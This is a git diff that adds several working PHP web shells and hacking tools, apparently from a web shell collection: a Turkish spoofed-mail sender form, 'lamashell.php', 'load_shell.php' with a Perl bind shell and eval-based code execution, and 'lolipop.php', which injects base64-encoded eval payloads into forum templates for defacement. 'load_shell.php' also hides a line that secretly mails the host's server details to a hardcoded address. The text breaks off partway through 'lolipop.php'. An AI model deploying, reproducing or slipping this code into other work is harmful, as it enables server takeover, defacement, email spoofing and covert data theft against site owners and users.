+              <input name="kim" type="text" id="kim" size="33" />
+              </label>
+              <br />
+            Gönderen isim:
+            <input name="isim" type="text" id="isim" size="33" />
+            <br />
+            Gidecek email:
+            <input name="kime" type="text" id="kime" size="33" />
+            <br />
+            Baslik:
+            <input name="baslik" type="text" id="baslik" size="33" />
+            <textarea name="icerik" cols="50" rows="8" id="icerik"></textarea>
+            <br />
+            <input name="submit62" type="submit" id="submit62" value="Gönder" />
+            <br />
+            <?PHP
+$kim=$_POST['kim'];
+$kime=$_POST['kime'];
+$isim=$_POST['isim'];
+$baslik=$_POST['baslik'];
+$icerik=$_POST['icerik'];
+if($kim && $kime && $isim && $baslik && $icerik){
+$gonder=mail($kime, $baslik, $icerik, "From: ".$isim." <".$kim.">");
+if($gonder){echo'<script>alert("gonderildi..");</script>';}else{echo'<script>alert("uzgunum bi hata olustu..");</script>';}
+}
+?>
+          </p>
+        </form></td>
+      </tr>
+      <tr>
+        <td height="42" colspan="3" valign="bottom" bordercolor="#FFFFFF"><div align="center">
+          <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br />
+            Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5 <br />
+  "Hakim beye söyledik, biz suça meyilli insanlariz.."</p>
+          </div>          <div align="center"></div>          <div align="center"></div></td>
+      </tr>
+    </table>
+  </div>
\ No newline at end of file
diff --git a/php/lamashell.php b/php/lamashell.php
new file mode 100644
index 0000000..1df8222
--- /dev/null
+++ b/php/lamashell.php
@@ -0,0 +1,89 @@
+<?
+if($_POST['dir'] == "") {
+
+ $curdir = `pwd`;
+} else {
+ $curdir = $_POST['dir'];
+}
+
+if($_POST['king'] == "") {
+
+ $curcmd = "ls -lah";
+} else {
+ $curcmd = $_POST['king'];
+}
+
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+                        "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+  <head>
+    <title>lama's'hell v. 3.0</title>
+    <style type="text/css">
+     body {
+      color: white; background-color: black;
+      font-size: 12px;
+      font-family: Helvetica,Arial,Sans-Serif;
+     }
+    </style>
+  </head>
+  <body>
+    <pre>
+                              _           _
+                             / \_______ /|_\
+                            /          /_/ \__
+                           /             \_/ /
+                         _|_              |/|_
+                         _|_  O    _    O  _|_
+                         _|_      (_)      _|_
+                          \                 /
+                           _\_____________/_
+                          /  \/  (___)  \/  \
+                          \__(  o     o  )__/ <?
+$ob = @ini_get("open_basedir");
+$df = @ini_get("disable_functions");
+if( ini_get('safe_mode') ) {
+   echo "SM: 1 \\ ";
+} else {
+   echo "SM: 0 \\ ";
+}
+if(''==$df) {
+   echo "DF: 0 \\ ";
+} else {
+   echo "DF: ".$df." \\ ";
+}
+echo "".php_uname()."\n";
+?>
+<hr></pre>
+    <table><form method="post" enctype="multipart/form-data">
+      <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
+      <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
+      <td><input name="exe" type="submit" value="Execute"></td></tr>
+
+      <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
+      <td><input name="upl" type="submit" value="Upload"></td></tr>
+    </form></table>
+<pre><hr>
+<?
+    if(($_POST['upl']) == "Upload" ) {
+    if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
+        echo "The file has been uploaded<br><br>";
+    } else {
+        echo "There was an error uploading the file, please try again!";
+    }
+    }
+    if(($_POST['exe']) == "Execute") {
+     $curcmd = "cd ".$curdir.";".$curcmd;
+     $f=popen($curcmd,"r");
+     while (!feof($f)) {
+      $buffer = fgets($f, 4096);
+      $string .= $buffer;
+     }
+     pclose($f);
+     echo htmlspecialchars($string);
+    }
+?>
+    </pre>
+  </body>
+</html>
diff --git a/php/load_shell.php b/php/load_shell.php
new file mode 100644
index 0000000..75e1d34
--- /dev/null
+++ b/php/load_shell.php
@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
+Âîò êàêèå îí ïîääåğæèâàåò ôóíêöèè.
+- Ğàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüş PHP.  óäîáíîé òàáëèöå ïğåäñòàâëåíî ñîäåğæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ıòîé âåğñèè, íîğìàëüíûé âèä ïğàâ, à íå ÷èñëî :)).
+- Âûïîëíåíèå êîäà, ïõï ğóëèò ;)
+- Ğàáîòàåò ïğè register_globals=off
+- Áîëåå ïğèÿòíàÿ ğàáîòà â ñåéô ìîäå
+- Ïğîñìîòğ è ğåäàêòèğîâàíèå ôàéëîâ.
+- Çàêà÷êà ôàéëîâ ñ äğóãîãî ñåğâåğà ñ ïîìîùüş ñğåäñòâ PHP.
+- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
+- Âûïîëíåíèå ïğîèçâîëüíûõ êîìàíä íà ñåğâåğå.
+- Ñêğèïò âûäàåò çíà÷åíèå íåêîòîğûõ ïåğåìåííûõ. Íàïğèìåğ îí ñîîáùèò âêëş÷åí ëè ñåéô ìîä, åñëè äà, òî ñêğèïò âûâåäåò äèğåêòîğèş êîòîğàÿ,
+âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
+- Ğàáîòà ñêğèïòà îñíîâàíà íà îïğåäåëåíèè òèïà ñåğâåğà.
+- Åñëè ñêğèïò ğàáîòàåò ïîä óïğàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïğè âûïîëíåíèè êîìàíä ïåğåêîäèğóşòñÿ â win-1251.
+- Ïğèñóòñòâóåò ïğîñòåíüêèé ñêğèïò ïåğë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíşş äèğåêòğèş è ïîğò íà êîòîğîì ïîâåñèòñÿ áåêäîğ.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*Íà÷èíàåòñÿ*/
+
+/*Îïğåäåëÿåì òèï ñèñòåìû*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+
diff --git a/php/lolipop.php b/php/lolipop.php
new file mode 100644
index 0000000..6fb3876
--- /dev/null
+++ b/php/lolipop.php
@@ -0,0 +1,288 @@
+<p align="right"></p><body bgcolor="#FFFFFF"> 
+<?php 
+
+######################## Begining of Coding ;) ###################### 
+error_reporting(0); 
+
+    $info = $_SERVER['SERVER_SOFTWARE']; 
+    $site = getenv("HTTP_HOST"); 
+    $page = $_SERVER['SCRIPT_NAME']; 
+    $sname = $_SERVER['SERVER_NAME']; 
+    $uname = php_uname(); 
+    $smod = ini_get('safe_mode'); 
+    $disfunc = ini_get('disable_functions'); 
+    $yourip = $_SERVER['REMOTE_ADDR']; 
+    $serverip = $_SERVER['SERVER_ADDR']; 
+    $version = phpversion(); 
+    $ccc = realpath($_GET['chdir'])."/"; 
+    $fdel = $_GET['fdel']; 
+    $execute = $_POST['execute']; 
+    $cmd = $_POST['cmd']; 
+    $commander = $_POST['commander']; 
+    $ls = "ls -la"; 
+    $source = $_POST['source']; 
+    $gomkf = $_POST['gomkf']; 
+    $title = $_POST['title']; 
+    $sourcego = $_POST['sourcego']; 
+    $ftemp = "tmp"; 
+    $temp = tempnam($ftemp, "cx"); 
+    $fcopy = $_POST['fcopy']; 
+    $tuser = $_POST['tuser']; 
+    $user = $_POST['user']; 
+    $wdir = $_POST['wdir']; 
+    $tdir = $_POST['tdir']; 
+    $symgo = $_POST['symgo']; 
+    $sym = "xhackers.txt"; 
+    $to = $_POST['to']; 
+    $sbjct = $_POST['sbjct']; 
+    $msg = $_POST['msg']; 
+    $header = "From:".$_POST['header']; 
+
+
+//PHPinfo 
+
+if(isset($_POST['phpinfo'])) 
+{ 
+    die(phpinfo()); 
+} 
+//Guvenli mod vs vs 
+if ($smod) 
+{ 
+    $c_h = "<font color=red face='Verdana' size='1'>ON</font>"; 
+} 
+else 
+{ 
+    $c_h = "<font face='Verdana' size='1' color=green>OFF</font>"; 
+} 
+
+//Kapali Fonksiyonlar 
+if (''==($disfunc)) 
+{ 
+    $dis = "<font color=green>None</font>"; 
+} 
+else 
+{ 
+    $dis = "<font color=red>$disfunc</font>"; 
+} 
+//Dizin degisimi 
+if(isset($_GET['dir']) && is_dir($_GET['dir'])) 
+{ 
+ chdir($_GET['dir']); 
+} 
+
+$ccc = realpath($_GET['chdir'])."/"; 
+
+//Baslik 
+echo "<head> 
+<style> 
+body { font-size: 12px; 
+
+           font-family: arial, helvetica; 
+
+            scrollbar-width: 5; 
+
+            scrollbar-height: 5; 
+
+            scrollbar-face-color: black; 
+
+            scrollbar-shadow-color: silver; 
+
+            scrollbar-highlight-color: silver; 
+
+            scrollbar-3dlight-color:silver; 
+
+            scrollbar-darkshadow-color: silver; 
+
+            scrollbar-track-color: black; 
+
+            scrollbar-arrow-color: silver; 
+
+    } 
+</style> 
+
+<title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>"; 
+//Ana tablo 
+echo "<body text='#FFFFFF'> 
+<table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> 
+    <tr> 
+        <td><font color='#000000'> 
+
+
+          <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> 
+
+    </tr> 
+    <tr> 
+        <td  style='border: 1px solid #333333'> 
+        <font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>  
+    </tr> 
+</table>"; 
+echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font>    </tr> 
+'; 
+//Buton Listesi 
+echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value='  phpBB HACK.  '><input type=submit name=smf value='  SMF HACK.  '></form></center>"; 
+
+
+
+
+//VB HACK 
+if (isset($_POST['vbulletin'])) 
+{ 
+echo "<center><table border=0 width='100%'> 
+<tr><td> 
+<center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center> 
+    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+		  
+          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br> 
+          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
+die(); 
+} 
+$KingDefacer="Powered By Lolipop :))"; 
+$dbh = $_POST['dbh']; 
+$dbu = $_POST['dbu']; 
+$dbn = $_POST['dbn']; 
+$dbp = $_POST['dbp']; 
+$index = $_POST['index']; 
+$index=str_replace("\'","'",$index); 
+$set_index  = "{\${eval(base64_decode(\'"; 
+
+$set_index .= base64_encode("echo \"$index\";"); 
+
+
+$set_index .= "\'))}}{\${exit()}}</textarea>"; 
+
+
+if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) 
+{ 
+mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); 
+mysql_select_db($dbn) or die(mysql_error()); 
+$loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'"; 
+$loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'"; 
+$loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''"; 
+$result = mysql_query($loli1) or die (mysql_error()); 
+$result = mysql_query($loli2) or die (mysql_error()); 
+$result = mysql_query($loli3) or die (mysql_error()); 
+echo "<script>alert('Vb Hacked');</script>"; 
+} 
+
+//MyBB Hack 
+if (isset($_POST['mybulletin'])) 
+{ 
+echo "<center><table border=0 width='100%'> 
+<tr><td> 
+<center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center> 
+    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br> 
+          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
+die(); 
+} 
+$mybb_dbh = $_POST['mybbdbh']; 
+$mybb_dbu = $_POST['mybbdbu']; 
+$mybb_dbn = $_POST['mybbdbn']; 
+$mybb_dbp = $_POST['mybbdbp']; 
+$mybb_index = $_POST['mybbindex']; 
+
+if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) 
+{ 
+mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error()); 
+mysql_select_db($mybb_dbn) or die(mysql_error()); 
+$prefix="mybb_"; 
+$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'"; 
+
+$result = mysql_query($loli7) or die (mysql_error()); 
+
+echo "<script>alert('MyBB Hacked');</script>"; 
+} 
+//PhpBB 
+if (isset($_POST['phpbb'])) 
+{ 
+echo "<center><table border=0 width='100%'> 
+<tr><td> 
+<center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center> 
